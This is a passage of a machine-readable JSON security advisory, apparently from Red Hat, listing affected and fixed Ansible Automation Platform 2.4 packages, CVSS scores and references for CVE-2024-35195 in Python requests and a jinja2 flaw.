"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "jinja2: accepts keys containing non-attribute characters"
},
{
"cve": "CVE-2024-35195",
"cwe": {
"id": "CWE-670",
"name": "Always-Incorrect Control Flow Implementation"
},
"discovery_date": "2024-05-21T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2282114"
}
],
"notes": [
{
"category": "description",
"text": "An incorrect control flow implementation vulnerability was found in Requests. If the first request in a session is made with verify=False, all subsequent requests to the same host will continue to ignore cert verification.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "requests: subsequent requests to the same host ignore cert verification",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
],
"known_not_affected": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-35195"
},
{
"category": "external",
"summary": "RHBZ#2282114",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2282114"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-35195",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35195"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-35195",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-35195"
},
{
"category": "external",
"summary": "https://github.com/psf/requests/security/advisories/GHSA-9wx4-h78v-vm56",
"url": "https://github.com/psf/requests/security/advisories/GHSA-9wx4-h78v-vm56"
}
],
"release_date": "2024-05-20T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-07-12T01:43:40+00:00",
"details": "Red Hat Ansible Automation Platform",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
